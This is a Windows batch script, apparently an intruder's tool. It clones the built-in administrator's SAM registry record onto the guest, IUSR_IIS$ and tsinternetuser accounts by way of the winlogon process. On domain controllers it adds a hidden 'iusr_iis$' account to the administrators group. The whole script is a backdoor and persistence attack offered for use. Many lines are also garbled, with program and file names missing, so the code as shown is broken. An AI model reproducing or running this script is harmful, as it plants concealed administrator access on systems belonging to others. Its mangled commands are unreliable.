@echo ^<zpid^> ^<password^>
@echo __________________________________________________________
@rem This automatic cloning guest is an administrators group.
@rem If there is username, it means running bat in the terminal login environment. You need to manually enter the pid value.
@rem It is best to modify the password manually first. Execute this program twice. Ha ha. Mainly there is no concealment. Regedit is time-consuming.
@set zpath=%path%
@set zcd=%cd%
@set path=%path%;%windir%;%windir%\system32
:start
@net user guest |find /i "*Domain" &&echo Domain Controller, Dont clone. ADD user! &&goto DOMAIN
@if NOT "%USERNAME%"=="" echo username=[%username%],term_login mode. input PID. &&goto Term
:start1
@ | /i "" >a
@ a -f a -a 0,1 >b
@FOR /F "eol=; tokens=1,2,3* delims=, " %%i in (b) do @set zpid=%%i
@goto AUTO
:Term
@if "%1"=="" goto USAGE
@if NOT "%2"=="" net user guest %2
@if NOT "%2"=="" net user |find /i "tsinternetuser" >nul &&net user tsinternetuser %2
@set zpid=%1
:AUTO
@echo Make
@ -p "%windir%\ -e HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" -i %zpid% >nul
@ -p "%windir%\ -e name.$$$ HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names" -i %zpid% >nul
@echo Windows Registry Editor Version 5.00 >
@echo Windows Registry Editor Version 5.00 >
@echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5]>>
@echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003e8]>>
@type >a &echo "Unicode -->>> ansi . use it ansi." &if exist b del b
@echo "F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,\>>b
@ a -f a -a 4,0 |find "," >>b
@ a -f a -a 5,0 |find "," >>b
@ a -f a -a 6,0 |find "," >>b
@type b >>
@type b >>
:IIS
@set zda=no
@echo iusr_iis exec
@type name.$$$ >
@copy >nul
@FOR /L %%i IN (5,3,30) DO @( a -f -a %%i,0 |find /i "IUSR_IIS$" &&set zda=%%i)
@if "%zda%" =="no" goto PSU
@ "IUSR_IIS$" /R /I >nul
@ "Editor" /R /I >nul
@ /v /n "" >n1
@findstr /I "%zda%" n1 >
@setx a -f -a 0,1 -d () >zdc
@del n1
@del
@del name.$$$
@del
@del a
@del b
@For /F "tokens=1,2* delims= " %%i in (zdc) do @(echo %%i>zdd)
@For /F "tokens=1,2* delims= " %%i in (zdd) do @(set zdd=%%i)
@copy >nul
@echo "1f5" "%zdd%" /I
@ "1f5" "%zdd%" /I
@del zdc
@del zdd
:PSU
@attrib -s -r >nul
@attrib -s -r >nul
@copy >nul
@copy >nul
@ -p "%windir%\ -s " -i %zpid% >nul
@ -p "%windir%\ -s " -i %zpid% >nul
@if NOT "%zda%"=="no" -p "%windir%\ -s " -i %zpid% >nul
@if NOT "%zda%"=="no" net user iusr_iis$ /active:yes >nul
@if NOT "%zda%"=="no" net user iusr_iis$ /active:no >nul
@copy >nul
@copy >nul
@attrib +r +s >nul
@attrib +r +s >nul
@net user guest /active:yes >nul
@net user guest /active:no >nul
@net user |find /I "tsinternetuser" || goto NEXT
@net user tsinternetuser /active:yes >nul
@net user tsinternetuser /active:no >nul
@if exist del /f >nul
@if exist del /f >nul
@if exist del /f >nul
:Next
@goto end
:DOMAIN
@rem add user iusr_iis$
@if "%2"=="" echo "not input guest of password" &&goto END
@net user |find /i "iusr_iis" >nul ||net user iusr_iis$ %2 /add
@net localgroup administrators |find /i "iusr_iis$" >nul ||net localgroup administrators iusr_iis$ /add
@goto END
:USAGE
@ | /i "WINLOGON explorer"
@echo " zpid <password> "
@echo " Need cur winlogon PID ,Term_mode,Must this Term_login_winlogon_pid. "
@goto end1
:END
@echo ________ALL User IN administrators :
@net localgroup administrators
:END1
@echo -p "%windir%\ -s " -i %zpid%
@set path=%zpath%
@set zpath=
@set zcd=
@set zda=
@set zdb=
@set zdd=
@set zpid=